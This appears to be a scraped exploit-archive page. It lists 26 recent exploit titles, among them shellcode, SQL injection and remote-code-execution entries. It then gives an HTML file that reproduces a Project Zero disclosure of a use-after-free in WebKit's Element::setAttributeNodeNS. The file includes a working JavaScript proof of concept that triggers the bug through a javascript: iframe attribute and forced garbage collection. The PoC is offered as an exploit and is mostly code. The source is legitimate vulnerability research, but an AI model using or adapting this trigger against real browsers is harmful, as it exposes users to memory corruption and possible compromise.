42e94b4366
26 new exploits Microsoft MsMpEng - Remotely Exploitable Use-After-Free due to Design Issue in GC Engine Microsoft MsMpEng - Multiple Crashes While Scanning Malformed Files Microsoft MsMpEng - Use-After-Free via Saved Callers WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope WebKit - 'Element::setAttributeNodeNS' Use-After-Free reiserfstune 3.6.25 - Local Buffer Overflow TiEmu 2.08 - Local Buffer Overflow Octopus Deploy - Authenticated Code Execution (Metasploit) Samba - 'is_known_pipename()' Arbitrary Module Load (Metasploit) CERIO DT-100G-N/DT-300N/CW-300N - Multiple Vulnerabilities Linux/x86 - execve(/bin/sh_) Shellcode (19 bytes) Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes) uc-http Daemon - Local File Inclusion / Directory Traversal Trend Micro Deep Security version 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution IBM Informix Dynamic Server / Informix Open Admin Tool - DLL Injection / Remote Code Execution / Heap Buffer Overflow WordPress Plugin Huge-IT Video Gallery 2.0.4 - SQL Injection TerraMaster F2-420 NAS TOS 3.0.30 - Unauthenticated Remote Code Execution as Root Piwigo Plugin Facetag 0.0.3 - SQL Injection OV3 Online Administration 3.0 - Directory Traversal OV3 Online Administration 3.0 - Remote Code Execution OV3 Online Administration 3.0 - SQL Injection Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting WebKit - 'Document::prepareForDestruction' and 'CachedFrame' Universal Cross-Site Scripting
55 lines
1.5 KiB
HTML
Executable file
55 lines
1.5 KiB
HTML
Executable file
<!--
|
|
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1187
|
|
|
|
Here's a snippet of Element::setAttributeNodeNS.
|
|
|
|
ExceptionOr<RefPtr<Attr>> Element::setAttributeNodeNS(Attr& attrNode)
|
|
{
|
|
...
|
|
setAttributeInternal(index, attrNode.qualifiedName(), attrNode.value(), NotInSynchronizationOfLazyAttribute);
|
|
|
|
attrNode.attachToElement(*this);
|
|
treeScope().adoptIfNeeded(attrNode);
|
|
ensureAttrNodeListForElement(*this).append(&attrNode);
|
|
|
|
return WTFMove(oldAttrNode);
|
|
}
|
|
|
|
|setAttributeInternal| may execute arbitrary JavaScript. If |setAttributeNodeNS| is called again in |setAttributeInternal|, there will be two |Attr| that has the same owner element and the same name after the first |setAttributeNodeNS| call. One of the |Attr|s will hold the raw pointer of the owner element even if the owner element is freed.
|
|
|
|
|
|
PoC:
|
|
-->
|
|
|
|
<body>
|
|
<script>
|
|
|
|
function gc() {
|
|
for (let i = 0; i < 0x40; i++) {
|
|
new ArrayBuffer(0x1000000);
|
|
}
|
|
}
|
|
|
|
window.callback = () => {
|
|
window.callback = null;
|
|
|
|
d.setAttributeNodeNS(src);
|
|
f.setAttributeNodeNS(document.createAttribute('src'));
|
|
};
|
|
|
|
let src = document.createAttribute('src');
|
|
src.value = 'javascript:parent.callback()';
|
|
|
|
let d = document.createElement('div');
|
|
let f = document.body.appendChild(document.createElement('iframe'));
|
|
f.setAttributeNodeNS(src);
|
|
f.remove();
|
|
f = null;
|
|
src = null;
|
|
|
|
gc();
|
|
|
|
alert(d.attributes[0].ownerElement);
|
|
|
|
</script>
|
|
</body>
|